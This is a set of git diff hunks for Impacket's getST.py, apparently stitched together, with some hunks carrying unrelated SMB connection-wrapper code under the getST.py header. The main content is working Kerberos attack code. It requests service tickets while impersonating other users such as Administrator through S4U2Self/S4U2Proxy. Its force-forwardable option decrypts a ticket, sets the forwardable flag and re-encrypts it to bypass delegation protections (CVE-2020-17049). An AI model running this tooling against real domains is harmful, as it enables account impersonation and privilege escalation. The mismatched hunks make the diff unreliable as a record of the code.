-        if self.getDialect() not in [SMB2_DIALECT_002, SMB2_DIALECT_21, SMB2_DIALECT_30]:
-            raise SessionError(error = nt_errors.STATUS_NOT_SUPPORTED)
-
-        fid = self.openFile(tid, path, GENERIC_READ | GENERIC_WRITE,
-                            creationOption=FILE_OPEN_REPARSE_POINT)
-
-        reparseData = MOUNT_POINT_REPARSE_GUID_DATA_STRUCTURE()
-
-        reparseData['DataBuffer'] = b""
-
-        try:
-            self._SMBConnection.ioctl(tid, fid, FSCTL_DELETE_REPARSE_POINT, flags=SMB2_0_IOCTL_IS_FSCTL,
-                                      inputBlob=reparseData)
-        except (smb.SessionError, smb3.SessionError) as e:
-            self.closeFile(tid, fid)
-            raise SessionError(e.get_error_code(), e.get_error_packet())
-
-        self.closeFile(tid, fid)
-
-    def rename(self, shareName, oldPath, newPath):
-        """
-        renames a file/directory
-
-        :param string shareName: name for the share where the files/directories are
-        :param string oldPath: the old path name or the directory/file to rename
-        :param string newPath: the new path name or the directory/file to rename
-
-        :return: True
-        :raise SessionError: if error
-        """
-
-        try:
-            return self._SMBConnection.rename(shareName, oldPath, newPath)
-        except (smb.SessionError, smb3.SessionError) as e:
-            raise SessionError(e.get_error_code(), e.get_error_packet())
-
-    def reconnect(self):
-        """
-        reconnects the SMB object based on the original options and credentials used. Only exception is that
-        manualNegotiate will not be honored.
-        Not only the connection will be created but also a login attempt using the original credentials and
-        method (Kerberos, PtH, etc)
-
-        :return: True
-        :raise SessionError: if error
-        """
-        userName, password, domain, lmhash, nthash, aesKey, TGT, TGS = self.getCredentials()
-        self.negotiateSession(self._preferredDialect)
-        if self._doKerberos is True:
-            self.kerberosLogin(userName, password, domain, lmhash, nthash, aesKey, self._kdcHost, TGT, TGS, self._useCache)
-        else:
-            self.login(userName, password, domain, lmhash, nthash, self._ntlmFallback)
-
-        return True
-
-    def setTimeout(self, timeout):
-        try:
-            return self._SMBConnection.set_timeout(timeout)
-        except (smb.SessionError, smb3.SessionError) as e:
-            raise SessionError(e.get_error_code(), e.get_error_packet())
-
-    def getSessionKey(self):
-        if self.getDialect() == smb.SMB_DIALECT:
-            return self._SMBConnection.get_session_key()
-        else:
-            return self._SMBConnection.getSessionKey()
-
-    def setSessionKey(self, key):
-        if self.getDialect() == smb.SMB_DIALECT:
-            return self._SMBConnection.set_session_key(key)
-        else:
-            return self._SMBConnection.setSessionKey(key)
-
-    def setHostnameValidation(self, validate, accept_empty, hostname):
-        return self._SMBConnection.set_hostname_validation(validate, accept_empty, hostname)
-
-    def close(self):
-        """
-        logs off and closes the underlying _NetBIOSSession()
-
-        :return: None
-        """
-        try:
-            self.logoff()
+                logging.debug("No valid credentials found in cache. ")
         except:
+            # No cache present
             pass
-        self._SMBConnection.close_session()
 
+        if tgt is None:
+            # Still no TGT
+            userName = Principal(self.__user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
+            logging.info('Getting TGT for user')
+            tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
+                                                                    unhexlify(self.__lmhash), unhexlify(self.__nthash),
+                                                                    self.__aesKey,
+                                                                    self.__kdcHost)
 
-class SessionError(Exception):
-    """
-    This is the exception every client should catch regardless of the underlying
-    SMB version used. We'll take care of that. NETBIOS exceptions are NOT included,
-    since all SMB versions share the same NETBIOS instances.
-    """
-    def __init__( self, error = 0, packet=0):
-        Exception.__init__(self)
-        self.error = error
-        self.packet = packet
-
-    def getErrorCode( self ):
-        return self.error
-
-    def getErrorPacket( self ):
-        return self.packet
-
-    def getErrorString( self ):
-        return nt_errors.ERROR_MESSAGES[self.error]
-
-    def __str__( self ):
-        if self.error in nt_errors.ERROR_MESSAGES:
-            return 'SMB SessionError: %s(%s)' % (nt_errors.ERROR_MESSAGES[self.error])
+        # Ok, we have valid TGT, let's try to get a service ticket
+        if self.__options.impersonate is None:
+            # Normal TGS interaction
+            logging.info('Getting ST for user')
+            serverName = Principal(self.__options.spn, type=constants.PrincipalNameType.NT_SRV_INST.value)
+            tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, domain, self.__kdcHost, tgt, cipher, sessionKey)
+            self.__saveFileName = self.__user
         else:
-            return 'SMB SessionError: 0x%x' % self.error
+            # Here's the rock'n'roll
+            try:
+                logging.info('Impersonating %s' % self.__options.impersonate)
+                # Editing below to pass hashes for decryption
+                if self.__additional_ticket is not None:
+                    tgs, cipher, oldSessionKey, sessionKey = self.doS4U2ProxyWithAdditionalTicket(tgt, cipher, oldSessionKey, sessionKey, unhexlify(self.__nthash), self.__aesKey,
+                                                                                                  self.__kdcHost, self.__additional_ticket)
+                else:
+                    tgs, cipher, oldSessionKey, sessioKey = self.doS4U(tgt, cipher, oldSessionKey, sessionKey, unhexlify(self.__nthash), self.__aesKey, self.__kdcHost)
+            except Exception as e:
+                logging.debug("Exception", exc_info=True)
+                logging.error(str(e))
+                if str(e).find('KDC_ERR_S_PRINCIPAL_UNKNOWN') >= 0:
+                    logging.error('Probably user %s does not have constrained delegation permisions or impersonated user does not exist' % self.__user)
+                if str(e).find('KDC_ERR_BADOPTION') >= 0:
+                    logging.error('Probably SPN is not allowed to delegate by user %s or initial TGT not forwardable' % self.__user)
+
+                return
+            self.__saveFileName = self.__options.impersonate
+
+        self.saveTicket(tgs, oldSessionKey)
+
+
+if __name__ == '__main__':
+    print(version.BANNER)
+
+    parser = argparse.ArgumentParser(add_help=True, description="Given a password, hash or aesKey, it will request a "
+                                                                "Service Ticket and save it as ccache")
+    parser.add_argument('identity', action='store', help='[domain/]username[:password]')
+    parser.add_argument('-spn', action="store", help='SPN (service/server) of the target service the '
+                                                     'service ticket will' ' be generated for')
+    parser.add_argument('-impersonate', action="store", help='target username that will be impersonated (thru S4U2Self)'
+                                                             ' for quering the ST. Keep in mind this will only work if '
+                                                             'the identity provided in this scripts is allowed for '
+                                                             'delegation to the SPN specified')
+    parser.add_argument('-altservice', action="store", help='SPN (service/server) you want to change the TGS ticket to')
+    parser.add_argument('-self', dest='no_s4u2proxy', action='store_true', help='Only do S4U2self, no S4U2proxy')
+    parser.add_argument('-additional-ticket', action='store', metavar='ticket.ccache', help='include a forwardable service ticket in a S4U2Proxy request for RBCD + KCD Kerberos only')
+    parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
+    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
+    parser.add_argument('-force-forwardable', action='store_true', help='Force the service ticket obtained through '
+                                                                        'S4U2Self to be forwardable. For best results, the -hashes and -aesKey values for the '
+                                                                        'specified -identity should be provided. This allows impresonation of protected users '
+                                                                        'and bypass of "Kerberos-only" constrained delegation restrictions. See CVE-2020-17049')
+
+    group = parser.add_argument_group('authentication')
+
+    group.add_argument('-hashes', action="store", metavar="LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
+    group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
+    group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
+                                                       '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '
+                                                       'ones specified in the command line')
+    group.add_argument('-aesKey', action="store", metavar="hex key", help='AES key to use for Kerberos Authentication '
+                                                                          '(128 or 256 bits)')
+    group.add_argument('-dc-ip', action='store', metavar="ip address", help='IP Address of the domain controller. If '
+                                                                            'ommited it use the domain part (FQDN) specified in the target parameter')
+
+    if len(sys.argv) == 1:
+        parser.print_help()
+        print("\nExamples: ")
+        print("\t./getST.py -spn cifs/contoso-dc -hashes lm:nt contoso.com/user\n")
+        print("\tit will use the lm:nt hashes for authentication. If you don't specify them, a password will be asked")
+        sys.exit(1)
+
+    options = parser.parse_args()
+
+    # Init the example's logger theme
+    logger.init(options.ts)
+
+    if options.debug is True:
+        logging.getLogger().setLevel(logging.DEBUG)
+        # Print the Library's installation path
+        logging.debug(version.getInstallationPath())
+    else:
+        logging.getLogger().setLevel(logging.INFO)
+    if options.altservice != None and len(options.altservice.split('/')) != 2:
+        parser.error('argument -altservice should be specified as service/server format')
+    if not options.no_s4u2proxy and options.spn is None:
+        parser.error("argument -spn is required, except when -self is set")
+    domain, username, password = parse_credentials(options.identity)
+
+    try:
+        if domain is None:
+            logging.critical('Domain should be specified!')
+            sys.exit(1)
+
+        if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
+            from getpass import getpass
+
+            password = getpass("Password:")
+
+        if options.aesKey is not None:
+            options.k = True
+
+        executer = GETST(username, password, domain, options)
+        executer.run()
+    except Exception as e:
+        if logging.getLogger().level == logging.DEBUG:
+            import traceback
+
+            traceback.print_exc()
+        print(str(e))

--- a/examples/getST.py
+++ b/examples/getST.py
@@ -741,7 +741,7 @@ if __name__ == '__main__':
         logging.debug(version.getInstallationPath())
     else:
         logging.getLogger().setLevel(logging.INFO)
-    if options.alt_service.split('/') != 2:
+    if len(options.alt_service.split('/')) != 2:
         logging.critical('alt-service should be specified as service/host format')
         sys.exit(1)
     domain, username, password = parse_credentials(options.identity)

--- a/examples/getST.py
+++ b/examples/getST.py
@@ -87,7 +87,12 @@ class GETST:
     def saveTicket(self, ticket, sessionKey):
         logging.info('Saving ticket in %s' % (self.__saveFileName + '.ccache'))
         ccache = CCache()
-
+        if self.__saveFileName != None:
+            decodedTGS = decoder.decode(ticket, asn1Spec = TGS_REP())[0]
+            decodedTGS['ticket']['sname']['name-type'] = 0
+            decodedTGS['ticket']['sname']['name-string'][0] = self.__saveFileName.split('/')[0]
+            decodedTGS['ticket']['sname']['name-string'][1] = self.__saveFileName.split('/')[1]
+            ticket = encoder.encode(decodedTGS)
         ccache.fromTGS(ticket, sessionKey, sessionKey, self.__alt_service)
         ccache.saveFile(self.__saveFileName + '.ccache')
 
@@ -688,7 +693,7 @@ if __name__ == '__main__':
                                                                 "Service Ticket and save it as ccache")
     parser.add_argument('identity', action='store', help='[domain/]username[:password]')
     parser.add_argument('-spn', action="store", help='SPN (service/server) of the target service the '
-                                                                    'service ticket will' ' be generated for')
+                                                     'service ticket will' ' be generated for')
     parser.add_argument('-impersonate', action="store", help='target username that will be impersonated (thru S4U2Self)'
                                                              ' for quering the ST. Keep in mind this will only work if '
                                                              'the identity provided in this scripts is allowed for '

--- a/examples/getST.py
+++ b/examples/getST.py
@@ -1,759 +1,1029 @@
-#!/usr/bin/env python
 # Impacket - Collection of Python classes for working with network protocols.
 #
-# SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved.
+# SECUREAUTH LABS. Copyright (C) 2020 SecureAuth Corporation. All rights reserved.
 #
 # This software is provided under a slightly modified version
 # of the Apache Software License. See the accompanying LICENSE file
 # for more information.
 #
 # Description:
-#   Given a password, hash, aesKey or TGT in ccache, it will request a Service Ticket and save it as ccache
-#   If the account has constrained delegation (with protocol transition) privileges you will be able to use
-#   the -impersonate switch to request the ticket on behalf other user (it will use S4U2Self/S4U2Proxy to
-#   request the ticket.)
+#   Wrapper class for SMB1/2/3 so it's transparent for the client.
+#   You can still play with the low level methods (version dependent)
+#   by calling getSMBServer()
 #
-#   Similar feature has been implemented already by Benjamin Delphi (@gentilkiwi) in Kekeo (s4u)
-#
-#   Examples:
-#       ./getST.py -hashes lm:nt -spn cifs/contoso-dc contoso.com/user
-#   or
-#   If you have tickets cached (run klist to verify) the script will use them
-#         ./getST.py -k -spn cifs/contoso-dc contoso.com/user
-#   Be sure tho, that the cached TGT has the forwardable flag set (klist -f). getTGT.py will ask forwardable tickets
-#   by default.
-#
-#   Also, if the account is configured with constrained delegation (with protocol transition) you can request
-#   service tickets for other users, assuming the target SPN is allowed for delegation:
-#         ./getST.py -k -impersonate Administrator -spn cifs/contoso-dc contoso.com/user
-#
-#   The output of this script will be a service ticket for the Administrator user.
-#
-#   Once you have the ccache file, set it in the KRB5CCNAME variable and use it for fun and profit.
-#
-# Author:
-#   Alberto Solino (@agsolino)
+# Author: Alberto Solino (@agsolino)
 #
 
-from __future__ import division
-from __future__ import print_function
-import argparse
-import datetime
-import logging
-import os
-import random
-import struct
-import sys
-from binascii import hexlify, unhexlify
-from six import b
-
-from pyasn1.codec.der import decoder, encoder
-from pyasn1.type.univ import noValue
-
-from impacket import version
-from impacket.examples import logger
-from impacket.examples.utils import parse_credentials
-from impacket.krb5 import constants
-from impacket.krb5.asn1 import AP_REQ, AS_REP, TGS_REQ, Authenticator, TGS_REP, seq_set, seq_set_iter, PA_FOR_USER_ENC, \
-    Ticket as TicketAsn1, EncTGSRepPart, PA_PAC_OPTIONS, EncTicketPart
-from impacket.krb5.ccache import CCache
-from impacket.krb5.crypto import Key, _enctype_table, _HMACMD5, _AES256CTS, Enctype
-from impacket.krb5.constants import TicketFlags, encodeFlags
-from impacket.krb5.kerberosv5 import getKerberosTGS
-from impacket.krb5.kerberosv5 import getKerberosTGT, sendReceive
-from impacket.krb5.types import Principal, KerberosTime, Ticket
-from impacket.ntlm import compute_nthash
-from impacket.winregistry import hexdump
-
-
-class GETST:
-    def __init__(self, target, password, domain, options):
-        self.__password = password
-        self.__user = target
-        self.__domain = domain
-        self.__lmhash = ''
-        self.__nthash = ''
-        self.__aesKey = options.aesKey
-        self.__options = options
-        self.__kdcHost = options.dc_ip
-        self.__force_forwardable = options.force_forwardable
-        self.__additional_ticket = options.additional_ticket
-        self.__saveFileName = None
-        if options.hashes is not None:
-            self.__lmhash, self.__nthash = options.hashes.split(':')
-
-    def saveTicket(self, ticket, sessionKey, alt_service=None):
-        logging.info('Saving ticket in %s' % (self.__saveFileName + '.ccache'))
-        ccache = CCache()
-
-        ccache.fromTGS(ticket, sessionKey, sessionKey, alt_service)
-        ccache.saveFile(self.__saveFileName + '.ccache')
-
-    def doS4U2ProxyWithAdditionalTicket(self, tgt, cipher, oldSessionKey, sessionKey, nthash, aesKey, kdcHost, additional_ticket_path):
-        if not os.path.isfile(additional_ticket_path):
-            logging.error("Ticket %s doesn't exist" % additional_ticket_path)
-            exit(0)
-        else:
-            decodedTGT = decoder.decode(tgt, asn1Spec=AS_REP())[0]
-            logging.info("\tUsing additional ticket %s instead of S4U2Self" % additional_ticket_path)
-            ccache = CCache.loadFile(additional_ticket_path)
-            principal = ccache.credentials[0].header['server'].prettyPrint()
-            creds = ccache.getCredential(principal.decode())
-            TGS = creds.toTGS(principal)
-
-            tgs = decoder.decode(TGS['KDC_REP'], asn1Spec=TGS_REP())[0]
-
-            if logging.getLogger().level == logging.DEBUG:
-                logging.debug('TGS_REP')
-                print(tgs.prettyPrint())
-
-            if self.__force_forwardable:
-                # Convert hashes to binary form, just in case we're receiving strings
-                if isinstance(nthash, str):
-                    try:
-                        nthash = unhexlify(nthash)
-                    except TypeError:
-                        pass
-                if isinstance(aesKey, str):
-                    try:
-                        aesKey = unhexlify(aesKey)
-                    except TypeError:
-                        pass
-
-                # Compute NTHash and AESKey if they're not provided in arguments
-                if self.__password != '' and self.__domain != '' and self.__user != '':
-                    if not nthash:
-                        nthash = compute_nthash(self.__password)
-                        if logging.getLogger().level == logging.DEBUG:
-                            logging.debug('NTHash')
-                            print(hexlify(nthash).decode())
-                    if not aesKey:
-                        salt = self.__domain.upper() + self.__user
-                        aesKey = _AES256CTS.string_to_key(self.__password, salt, params=None).contents
-                        if logging.getLogger().level == logging.DEBUG:
-                            logging.debug('AESKey')
-                            print(hexlify(aesKey).decode())
-
-                # Get the encrypted ticket returned in the TGS. It's encrypted with one of our keys
-                cipherText = tgs['ticket']['enc-part']['cipher']
-
-                # Check which cipher was used to encrypt the ticket. It's not always the same
-                # This determines which of our keys we should use for decryption/re-encryption
-                newCipher = _enctype_table[int(tgs['ticket']['enc-part']['etype'])]
-                if newCipher.enctype == Enctype.RC4:
-                    key = Key(newCipher.enctype, nthash)
-                else:
-                    key = Key(newCipher.enctype, aesKey)
-
-                # Decrypt and decode the ticket
-                # Key Usage 2
-                # AS-REP Ticket and TGS-REP Ticket (includes tgs session key or
-                #  application session key), encrypted with the service key
-                #  (section 5.4.2)
-                plainText = newCipher.decrypt(key, 2, cipherText)
-                encTicketPart = decoder.decode(plainText, asn1Spec=EncTicketPart())[0]
-
-                # Print the flags in the ticket before modification
-                logging.debug('\tService ticket from S4U2self flags: ' + str(encTicketPart['flags']))
-                logging.debug('\tService ticket from S4U2self is'
-                              + ('' if (encTicketPart['flags'][TicketFlags.forwardable.value] == 1) else ' not')
-                              + ' forwardable')
-
-                # Customize flags the forwardable flag is the only one that really matters
-                logging.info('\tForcing the service ticket to be forwardable')
-                # convert to string of bits
-                flagBits = encTicketPart['flags'].asBinary()
-                # Set the forwardable flag. Awkward binary string insertion
-                flagBits = flagBits[:TicketFlags.forwardable.value] + '1' + flagBits[TicketFlags.forwardable.value + 1:]
-                # Overwrite the value with the new bits
-                encTicketPart['flags'] = encTicketPart['flags'].clone(value=flagBits)  # Update flags
-
-                logging.debug('\tService ticket flags after modification: ' + str(encTicketPart['flags']))
-                logging.debug('\tService ticket now is'
-                              + ('' if (encTicketPart['flags'][TicketFlags.forwardable.value] == 1) else ' not')
-                              + ' forwardable')
-
-                # Re-encode and re-encrypt the ticket
-                # Again, Key Usage 2
-                encodedEncTicketPart = encoder.encode(encTicketPart)
-                cipherText = newCipher.encrypt(key, 2, encodedEncTicketPart, None)
-
-                # put it back in the TGS
-                tgs['ticket']['enc-part']['cipher'] = cipherText
-
-            ################################################################################
-            # Up until here was all the S4USelf stuff. Now let's start with S4U2Proxy
-            # So here I have a ST for me.. I now want a ST for another service
-            # Extract the ticket from the TGT
-            ticketTGT = Ticket()
-            ticketTGT.from_asn1(decodedTGT['ticket'])
-
-            # Get the service ticket
-            ticket = Ticket()
-            ticket.from_asn1(tgs['ticket'])
-
-            apReq = AP_REQ()
-            apReq['pvno'] = 5
-            apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
-
-            opts = list()
-            apReq['ap-options'] = constants.encodeFlags(opts)
-            seq_set(apReq, 'ticket', ticketTGT.to_asn1)
-
-            authenticator = Authenticator()
-            authenticator['authenticator-vno'] = 5
-            authenticator['crealm'] = str(decodedTGT['crealm'])
-
-            clientName = Principal()
-            clientName.from_asn1(decodedTGT, 'crealm', 'cname')
-
-            seq_set(authenticator, 'cname', clientName.components_to_asn1)
-
-            now = datetime.datetime.utcnow()
-            authenticator['cusec'] = now.microsecond
-            authenticator['ctime'] = KerberosTime.to_asn1(now)
-
-            encodedAuthenticator = encoder.encode(authenticator)
-
-            # Key Usage 7
-            # TGS-REQ PA-TGS-REQ padata AP-REQ Authenticator (includes
-            # TGS authenticator subkey), encrypted with the TGS session
-            # key (Section 5.5.1)
-            encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)
-
-            apReq['authenticator'] = noValue
-            apReq['authenticator']['etype'] = cipher.enctype
-            apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
-
-            encodedApReq = encoder.encode(apReq)
-
-            tgsReq = TGS_REQ()
-
-            tgsReq['pvno'] = 5
-            tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
-            tgsReq['padata'] = noValue
-            tgsReq['padata'][0] = noValue
-            tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
-            tgsReq['padata'][0]['padata-value'] = encodedApReq
-
-            # Add resource-based constrained delegation support
-            paPacOptions = PA_PAC_OPTIONS()
-            paPacOptions['flags'] = constants.encodeFlags((constants.PAPacOptions.resource_based_constrained_delegation.value,))
-
-            tgsReq['padata'][1] = noValue
-            tgsReq['padata'][1]['padata-type'] = constants.PreAuthenticationDataTypes.PA_PAC_OPTIONS.value
-            tgsReq['padata'][1]['padata-value'] = encoder.encode(paPacOptions)
-
-            reqBody = seq_set(tgsReq, 'req-body')
-
-            opts = list()
-            # This specified we're doing S4U
-            opts.append(constants.KDCOptions.cname_in_addl_tkt.value)
-            opts.append(constants.KDCOptions.canonicalize.value)
-            opts.append(constants.KDCOptions.forwardable.value)
-            opts.append(constants.KDCOptions.renewable.value)
-
-            reqBody['kdc-options'] = constants.encodeFlags(opts)
-            service2 = Principal(self.__options.spn, type=constants.PrincipalNameType.NT_SRV_INST.value)
-            seq_set(reqBody, 'sname', service2.components_to_asn1)
-            reqBody['realm'] = self.__domain
-
-            myTicket = ticket.to_asn1(TicketAsn1())
-            seq_set_iter(reqBody, 'additional-tickets', (myTicket,))
-
-            now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
-
-            reqBody['till'] = KerberosTime.to_asn1(now)
-            reqBody['nonce'] = random.getrandbits(31)
-            seq_set_iter(reqBody, 'etype',
-                         (
-                             int(constants.EncryptionTypes.rc4_hmac.value),
-                             int(constants.EncryptionTypes.des3_cbc_sha1_kd.value),
-                             int(constants.EncryptionTypes.des_cbc_md5.value),
-                             int(cipher.enctype)
-                         )
-                         )
-            message = encoder.encode(tgsReq)
-
-            logging.info('\tRequesting S4U2Proxy')
-            r = sendReceive(message, self.__domain, kdcHost)
-
-            tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
-
-            cipherText = tgs['enc-part']['cipher']
-
-            # Key Usage 8
-            # TGS-REP encrypted part (includes application session
-            # key), encrypted with the TGS session key (Section 5.4.2)
-            plainText = cipher.decrypt(sessionKey, 8, cipherText)
-
-            encTGSRepPart = decoder.decode(plainText, asn1Spec=EncTGSRepPart())[0]
-
-            newSessionKey = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
-
-            # Creating new cipher based on received keytype
-            cipher = _enctype_table[encTGSRepPart['key']['keytype']]
-
-            return r, cipher, sessionKey, newSessionKey
-
-    def doS4U(self, tgt, cipher, oldSessionKey, sessionKey, nthash, aesKey, kdcHost, s4u2self=False, alt_service=None):
-        decodedTGT = decoder.decode(tgt, asn1Spec=AS_REP())[0]
-        # Extract the ticket from the TGT
-        ticket = Ticket()
-        ticket.from_asn1(decodedTGT['ticket'])
-
-        apReq = AP_REQ()
-        apReq['pvno'] = 5
-        apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
-
-        opts = list()
-        apReq['ap-options'] = constants.encodeFlags(opts)
-        seq_set(apReq, 'ticket', ticket.to_asn1)
-
-        authenticator = Authenticator()
-        authenticator['authenticator-vno'] = 5
-        authenticator['crealm'] = str(decodedTGT['crealm'])
-
-        clientName = Principal()
-        clientName.from_asn1(decodedTGT, 'crealm', 'cname')
-
-        seq_set(authenticator, 'cname', clientName.components_to_asn1)
-
-        now = datetime.datetime.utcnow()
-        authenticator['cusec'] = now.microsecond
-        authenticator['ctime'] = KerberosTime.to_asn1(now)
-
-        if logging.getLogger().level == logging.DEBUG:
-            logging.debug('AUTHENTICATOR')
-            print(authenticator.prettyPrint())
-            print('\n')
-
-        encodedAuthenticator = encoder.encode(authenticator)
-
-        # Key Usage 7
-        # TGS-REQ PA-TGS-REQ padata AP-REQ Authenticator (includes
-        # TGS authenticator subkey), encrypted with the TGS session
-        # key (Section 5.5.1)
-        encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)
-
-        apReq['authenticator'] = noValue
-        apReq['authenticator']['etype'] = cipher.enctype
-        apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
-
-        encodedApReq = encoder.encode(apReq)
-
-        tgsReq = TGS_REQ()
-
-        tgsReq['pvno'] = 5
-        tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
-
-        tgsReq['padata'] = noValue
-        tgsReq['padata'][0] = noValue
-        tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
-        tgsReq['padata'][0]['padata-value'] = encodedApReq
-
-        # In the S4U2self KRB_TGS_REQ/KRB_TGS_REP protocol extension, a service
-        # requests a service ticket to itself on behalf of a user. The user is
-        # identified to the KDC by the user's name and realm.
-        clientName = Principal(self.__options.impersonate, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
-
-        S4UByteArray = struct.pack('<I', constants.PrincipalNameType.NT_PRINCIPAL.value)
-        S4UByteArray += b(self.__options.impersonate) + b(self.__domain) + b'Kerberos'
-
-        if logging.getLogger().level == logging.DEBUG:
-            logging.debug('S4UByteArray')
-            hexdump(S4UByteArray)
-
-        # Finally cksum is computed by calling the KERB_CHECKSUM_HMAC_MD5 hash
-        # with the following three parameters: the session key of the TGT of
-        # the service performing the S4U2Self request, the message type value
-        # of 17, and the byte array S4UByteArray.
-        checkSum = _HMACMD5.checksum(sessionKey, 17, S4UByteArray)
-
-        if logging.getLogger().level == logging.DEBUG:
-            logging.debug('CheckSum')
-            hexdump(checkSum)
-
-        paForUserEnc = PA_FOR_USER_ENC()
-        seq_set(paForUserEnc, 'userName', clientName.components_to_asn1)
-        paForUserEnc['userRealm'] = self.__domain
-        paForUserEnc['cksum'] = noValue
-        paForUserEnc['cksum']['cksumtype'] = int(constants.ChecksumTypes.hmac_md5.value)
-        paForUserEnc['cksum']['checksum'] = checkSum
-        paForUserEnc['auth-package'] = 'Kerberos'
-
-        if logging.getLogger().level == logging.DEBUG:
-            logging.debug('PA_FOR_USER_ENC')
-            print(paForUserEnc.prettyPrint())
-
-        encodedPaForUserEnc = encoder.encode(paForUserEnc)
-
-        tgsReq['padata'][1] = noValue
-        tgsReq['padata'][1]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_FOR_USER.value)
-        tgsReq['padata'][1]['padata-value'] = encodedPaForUserEnc
-
-        reqBody = seq_set(tgsReq, 'req-body')
-
-        opts = list()
-        opts.append(constants.KDCOptions.forwardable.value)
-        opts.append(constants.KDCOptions.renewable.value)
-        opts.append(constants.KDCOptions.canonicalize.value)
-
-        reqBody['kdc-options'] = constants.encodeFlags(opts)
-
-        serverName = Principal(self.__user, type=constants.PrincipalNameType.NT_UNKNOWN.value)
-
-        seq_set(reqBody, 'sname', serverName.components_to_asn1)
-        reqBody['realm'] = str(decodedTGT['crealm'])
-
-        now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
-
-        reqBody['till'] = KerberosTime.to_asn1(now)
-        reqBody['nonce'] = random.getrandbits(31)
-        seq_set_iter(reqBody, 'etype',
-                     (int(cipher.enctype), int(constants.EncryptionTypes.rc4_hmac.value)))
-
-        if logging.getLogger().level == logging.DEBUG:
-            logging.debug('Final TGS')
-            print(tgsReq.prettyPrint())
-
-        logging.info('\tRequesting S4U2self')
-        message = encoder.encode(tgsReq)
-
-        r = sendReceive(message, self.__domain, kdcHost)
-        if s4u2self:
-            return r, cipher, oldSessionKey, sessionKey
-        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
-
-        if logging.getLogger().level == logging.DEBUG:
-            logging.debug('TGS_REP')
-            print(tgs.prettyPrint())
-
-        if self.__force_forwardable:
-            # Convert hashes to binary form, just in case we're receiving strings
-            if isinstance(nthash, str):
-                try:
-                    nthash = unhexlify(nthash)
-                except TypeError:
-                    pass
-            if isinstance(aesKey, str):
-                try:
-                    aesKey = unhexlify(aesKey)
-                except TypeError:
-                    pass
-
-            # Compute NTHash and AESKey if they're not provided in arguments
-            if self.__password != '' and self.__domain != '' and self.__user != '':
-                if not nthash:
-                    nthash = compute_nthash(self.__password)
-                    if logging.getLogger().level == logging.DEBUG:
-                        logging.debug('NTHash')
-                        print(hexlify(nthash).decode())
-                if not aesKey:
-                    salt = self.__domain.upper() + self.__user
-                    aesKey = _AES256CTS.string_to_key(self.__password, salt, params=None).contents
-                    if logging.getLogger().level == logging.DEBUG:
-                        logging.debug('AESKey')
-                        print(hexlify(aesKey).decode())
-
-            # Get the encrypted ticket returned in the TGS. It's encrypted with one of our keys
-            cipherText = tgs['ticket']['enc-part']['cipher']
-
-            # Check which cipher was used to encrypt the ticket. It's not always the same
-            # This determines which of our keys we should use for decryption/re-encryption
-            newCipher = _enctype_table[int(tgs['ticket']['enc-part']['etype'])]
-            if newCipher.enctype == Enctype.RC4:
-                key = Key(newCipher.enctype, nthash)
-            else:
-                key = Key(newCipher.enctype, aesKey)
-
-            # Decrypt and decode the ticket
-            # Key Usage 2
-            # AS-REP Ticket and TGS-REP Ticket (includes tgs session key or
-            #  application session key), encrypted with the service key
-            #  (section 5.4.2)
-            plainText = newCipher.decrypt(key, 2, cipherText)
-            encTicketPart = decoder.decode(plainText, asn1Spec=EncTicketPart())[0]
-
-            # Print the flags in the ticket before modification
-            logging.debug('\tService ticket from S4U2self flags: ' + str(encTicketPart['flags']))
-            logging.debug('\tService ticket from S4U2self is'
-                          + ('' if (encTicketPart['flags'][TicketFlags.forwardable.value] == 1) else ' not')
-                          + ' forwardable')
-
-            # Customize flags the forwardable flag is the only one that really matters
-            logging.info('\tForcing the service ticket to be forwardable')
-            # convert to string of bits
-            flagBits = encTicketPart['flags'].asBinary()
-            # Set the forwardable flag. Awkward binary string insertion
-            flagBits = flagBits[:TicketFlags.forwardable.value] + '1' + flagBits[TicketFlags.forwardable.value + 1:]
-            # Overwrite the value with the new bits
-            encTicketPart['flags'] = encTicketPart['flags'].clone(value=flagBits)  # Update flags
-
-            logging.debug('\tService ticket flags after modification: ' + str(encTicketPart['flags']))
-            logging.debug('\tService ticket now is'
-                          + ('' if (encTicketPart['flags'][TicketFlags.forwardable.value] == 1) else ' not')
-                          + ' forwardable')
-
-            # Re-encode and re-encrypt the ticket
-            # Again, Key Usage 2
-            encodedEncTicketPart = encoder.encode(encTicketPart)
-            cipherText = newCipher.encrypt(key, 2, encodedEncTicketPart, None)
-
-            # put it back in the TGS
-            tgs['ticket']['enc-part']['cipher'] = cipherText
-
-        ################################################################################
-        # Up until here was all the S4USelf stuff. Now let's start with S4U2Proxy
-        # So here I have a ST for me.. I now want a ST for another service
-        # Extract the ticket from the TGT
-        ticketTGT = Ticket()
